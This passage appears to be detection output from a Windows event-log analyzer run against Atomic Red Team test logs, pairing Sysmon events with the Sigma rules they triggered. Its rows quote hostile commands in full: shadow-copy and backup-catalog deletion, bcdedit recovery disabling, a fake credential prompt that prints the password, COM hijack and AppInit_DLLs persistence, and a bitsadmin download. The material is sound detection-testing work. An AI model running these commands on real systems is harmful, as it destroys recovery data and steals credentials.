""/OUT:C:\Users\IEUser\AppData\Local\Temp\RES1BEA.tmp"" ""c:\AtomicRedTeam\CSC8EBD65DB33242A1BAD76494F485AF42.TMP"" | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"" /r:System.EnterpriseServices.dll /target:library /keyfile:key.snk C:\AtomicRedTeam\atomics\T1121\src\T1121.cs | LID: 0x50951 | PID: 4124 | PGUID: 747F3D96-D7BB-5D31-0000-00108F082A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:46:19.484 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"" T1121.dll | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1060 | PGUID: 
747F3D96-D7BB-5D31-0000-0010D5092A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:46:19.484 +09:00,MSEDGEWIN10,1,low,Evas,Possible Applocker Bypass,,rules/sigma/process_creation/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:46:20.767 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - COM Hijack | SetValue: HKCR\WOW6432Node\CLSID\{17C7DA62-8517-3DF1-A67C-BD4BCD2C5C3F}\InprocServer32\(Default): mscoree.dll | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe | PID: 1060 | PGUID: 747F3D96-D7BB-5D31-0000-0010D5092A00,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:46:20.775 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - COM Hijack | SetValue: HKCR\WOW6432Node\CLSID\{17C7DA62-8517-3DF1-A67C-BD4BCD2C5C3F}\InprocServer32\ThreadingModel: Both | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe | PID: 1060 | PGUID: 747F3D96-D7BB-5D31-0000-0010D5092A00,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:46:20.787 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - COM Hijack | SetValue: HKCR\WOW6432Node\CLSID\{17C7DA62-8517-3DF1-A67C-BD4BCD2C5C3F}\InprocServer32\Class: regsvcser.Bypass | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe | PID: 1060 | PGUID: 
747F3D96-D7BB-5D31-0000-0010D5092A00,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:46:20.802 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,"Persistence - COM Hijack | SetValue: HKCR\WOW6432Node\CLSID\{17C7DA62-8517-3DF1-A67C-BD4BCD2C5C3F}\InprocServer32\Assembly: T1121, Version=0.0.0.0, Culture=neutral, PublicKeyToken=cb1364609f40a1dc | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe | PID: 1060 | PGUID: 747F3D96-D7BB-5D31-0000-0010D5092A00",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:46:20.817 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - COM Hijack | SetValue: HKCR\WOW6432Node\CLSID\{17C7DA62-8517-3DF1-A67C-BD4BCD2C5C3F}\InprocServer32\RuntimeVersion: v4.0.30319 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe | PID: 1060 | PGUID: 747F3D96-D7BB-5D31-0000-0010D5092A00,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:46:20.824 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - COM Hijack | SetValue: HKCR\WOW6432Node\CLSID\{17C7DA62-8517-3DF1-A67C-BD4BCD2C5C3F}\InprocServer32\CodeBase: file:///C:/AtomicRedTeam/T1121.DLL | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe | PID: 1060 | PGUID: 747F3D96-D7BB-5D31-0000-0010D5092A00,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:46:20.830 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - COM Hijack | 
SetValue: HKCR\WOW6432Node\CLSID\{17C7DA62-8517-3DF1-A67C-BD4BCD2C5C3F}\InprocServer32\0.0.0.0\Class: regsvcser.Bypass | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe | PID: 1060 | PGUID: 747F3D96-D7BB-5D31-0000-0010D5092A00,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:46:20.841 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,"Persistence - COM Hijack | SetValue: HKCR\WOW6432Node\CLSID\{17C7DA62-8517-3DF1-A67C-BD4BCD2C5C3F}\InprocServer32\0.0.0.0\Assembly: T1121, Version=0.0.0.0, Culture=neutral, PublicKeyToken=cb1364609f40a1dc | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe | PID: 1060 | PGUID: 747F3D96-D7BB-5D31-0000-0010D5092A00",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:46:20.849 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - COM Hijack | SetValue: HKCR\WOW6432Node\CLSID\{17C7DA62-8517-3DF1-A67C-BD4BCD2C5C3F}\InprocServer32\0.0.0.0\RuntimeVersion: v4.0.30319 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe | PID: 1060 | PGUID: 747F3D96-D7BB-5D31-0000-0010D5092A00,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:46:20.858 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - COM Hijack | SetValue: HKCR\WOW6432Node\CLSID\{17C7DA62-8517-3DF1-A67C-BD4BCD2C5C3F}\InprocServer32\0.0.0.0\CodeBase: file:///C:/AtomicRedTeam/T1121.DLL | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe | PID: 1060 | PGUID: 
747F3D96-D7BB-5D31-0000-0010D5092A00,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:46:51.883 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""powershell.exe -command { = System.Management.Automation.Internal.Host.InternalHost.UI.PromptForCredential('Windows Security Update', '',[Environment]::UserName, [Environment]::UserDomainName); echo .GetNetworkCredential().Password;}"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4256 | PGUID: 747F3D96-D7DB-5D31-0000-001089A52A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:46:51.957 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: powershell.exe -command { = System.Management.Automation.Internal.Host.InternalHost.UI.PromptForCredential('Windows Security Update', '',[Environment]::UserName, [Environment]::UserDomainName); echo .GetNetworkCredential().Password;} | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""powershell.exe -command { = System.Management.Automation.Internal.Host.InternalHost.UI.PromptForCredential('Windows Security Update', '',[Environment]::UserName, [Environment]::UserDomainName); echo .GetNetworkCredential().Password;}"" | LID: 0x50951 | PID: 4452 | PGUID: 747F3D96-D7DB-5D31-0000-0010B5A82A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:46:51.957 +09:00,MSEDGEWIN10,1,low,Exec,Non Interactive 
PowerShell,,rules/sigma/process_creation/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:21.972 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence or CredAccess - Lsa NotificationPackge | SetValue: HKLM\System\CurrentControlSet\Control\Lsa\Notification Packages: Binary Data | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 3912 | PGUID: 747F3D96-D6F7-5D31-0000-00104ACE2500,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:21.972 +09:00,MSEDGEWIN10,13,medium,Persis,CurrentControlSet Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentcontrolset.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:37.096 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg.exe import c:\AtomicRedTeam\atomics\T1103\T1103.reg"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 3968 | PGUID: 747F3D96-D809-5D31-0000-00100A242B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:37.127 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg.exe import c:\AtomicRedTeam\atomics\T1103\T1103.reg | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg.exe import c:\AtomicRedTeam\atomics\T1103\T1103.reg"" | LID: 0x50951 | PID: 6056 | PGUID: 
747F3D96-D809-5D31-0000-00105C262B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:37.147 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,"Persistence - AppInit | SetValue: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs: C:\Tools\MessageBox64.dll,C:\Tools\MessageBox32.dll | Process: C:\Windows\system32\reg.exe | PID: 6056 | PGUID: 747F3D96-D809-5D31-0000-00105C262B00",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:37.147 +09:00,MSEDGEWIN10,13,medium,Persis,New DLL Added to AppInit_DLLs Registry Key,,rules/sigma/registry_event/sysmon_new_dll_added_to_appinit_dlls_registry_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:37.147 +09:00,MSEDGEWIN10,13,medium,Persis,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:37.168 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - via Windows Load | SetValue: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\LoadAppInit_DLLs: DWORD (0x00000001) | Process: C:\Windows\system32\reg.exe | PID: 6056 | PGUID: 747F3D96-D809-5D31-0000-00105C262B00,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:37.168 +09:00,MSEDGEWIN10,13,medium,Persis,CurrentVersion NT Autorun Keys 
Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:37.215 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 980 | PGUID: 747F3D96-D809-5D31-0000-001072292B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:40.691 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""vssadmin.exe delete shadows /all /quiet"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6896 | PGUID: 747F3D96-D80C-5D31-0000-0010223C2B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:40.706 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: vssadmin.exe delete shadows /all /quiet | Process: C:\Windows\System32\vssadmin.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""vssadmin.exe delete shadows /all /quiet"" | LID: 0x50951 | PID: 1124 | PGUID: 747F3D96-D80C-5D31-0000-0010843F2B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:40.706 +09:00,MSEDGEWIN10,1,critical,Evas | Impact,Shadow Copies Deletion Using Operating Systems Utilities,,rules/sigma/process_creation/proc_creation_win_shadow_copies_deletion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:40.863 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: 
""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1348 | PGUID: 747F3D96-D80C-5D31-0000-001005542B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:45.585 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""wbadmin.exe delete catalog -quiet"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4500 | PGUID: 747F3D96-D811-5D31-0000-001000632B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:45.585 +09:00,MSEDGEWIN10,1,critical,LatMov | Disc | Evas | Impact,WannaCry Ransomware,,rules/sigma/process_creation/proc_creation_win_malware_wannacry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:45.624 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: wbadmin.exe delete catalog -quiet | Process: C:\Windows\System32\wbadmin.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""wbadmin.exe delete catalog -quiet"" | LID: 0x50951 | PID: 6160 | PGUID: 747F3D96-D811-5D31-0000-001061652B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:45.624 +09:00,MSEDGEWIN10,1,critical,Evas | Impact,Shadow Copies Deletion Using Operating Systems Utilities,,rules/sigma/process_creation/proc_creation_win_shadow_copies_deletion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:45.624 +09:00,MSEDGEWIN10,1,critical,LatMov | Disc | Evas | Impact,WannaCry 
Ransomware,,rules/sigma/process_creation/proc_creation_win_malware_wannacry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:45.773 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\wbengine.exe"" | Process: C:\Windows\System32\wbengine.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 6064 | PGUID: 747F3D96-D811-5D31-0000-0010726A2B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:45.958 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\vds.exe | Process: C:\Windows\System32\vds.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 3184 | PGUID: 747F3D96-D811-5D31-0000-0010147C2B00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:46.112 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 2948 | PGUID: 747F3D96-D812-5D31-0000-0010AC892B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:46.302 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"Execution - Suspicious Schedule.Service Module Load | Image: C:\Windows\System32\taskschd.dll | Process: C:\Windows\System32\wbengine.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 6064 | PGUID: 747F3D96-D811-5D31-0000-0010726A2B00 | Hash: 
SHA1=BE65E71FC691867FFA1D3129CEAB67A0688A08CB,MD5=9A0C13D674AB2D72193653EF38D8FB8E,SHA256=15817A5CB717D4846AE753A27CD8859BCE63004143083027FA5EC9324DFC5188,IMPHASH=5694D579C32F1A7EB5FA54148C174C38",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:51.816 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6508 | PGUID: 747F3D96-D817-5D31-0000-001064AD2B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:51.865 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures | Process: C:\Windows\System32\bcdedit.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures"" | LID: 0x50951 | PID: 396 | PGUID: 747F3D96-D817-5D31-0000-001097B02B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:51.865 +09:00,MSEDGEWIN10,1,high,Impact,Modification of Boot Configuration,,rules/sigma/process_creation/proc_creation_win_bootconf_mod.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:51.997 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""bcdedit.exe /set {default} recoveryenabled no"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6216 | PGUID: 
747F3D96-D817-5D31-0000-001049B42B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:51.997 +09:00,MSEDGEWIN10,1,critical,LatMov | Disc | Evas | Impact,WannaCry Ransomware,,rules/sigma/process_creation/proc_creation_win_malware_wannacry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:52.010 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: bcdedit.exe /set {default} recoveryenabled no | Process: C:\Windows\System32\bcdedit.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""bcdedit.exe /set {default} recoveryenabled no"" | LID: 0x50951 | PID: 5984 | PGUID: 747F3D96-D817-5D31-0000-0010B7B62B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:52.010 +09:00,MSEDGEWIN10,1,critical,LatMov | Disc | Evas | Impact,WannaCry Ransomware,,rules/sigma/process_creation/proc_creation_win_malware_wannacry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:52.010 +09:00,MSEDGEWIN10,1,high,Impact,Modification of Boot Configuration,,rules/sigma/process_creation/proc_creation_win_bootconf_mod.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:52.046 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 7040 | PGUID: 747F3D96-D817-5D31-0000-0010C8BA2B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:57.227 
+09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""sdelete.exe C:\some\file.txt"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1632 | PGUID: 747F3D96-D81D-5D31-0000-0010B8CA2B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:57.274 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 7080 | PGUID: 747F3D96-D81D-5D31-0000-0010D7CD2B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:04.103 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /transfer /Download /priority Foreground https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\Windows\Temp\bitsadmin_flag.ps1"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6736 | PGUID: 747F3D96-D824-5D31-0000-001023F42B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:04.131 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: bitsadmin.exe /transfer /Download /priority Foreground https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\Windows\Temp\bitsadmin_flag.ps1 | Process: C:\Windows\System32\bitsadmin.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /transfer /Download /priority Foreground 
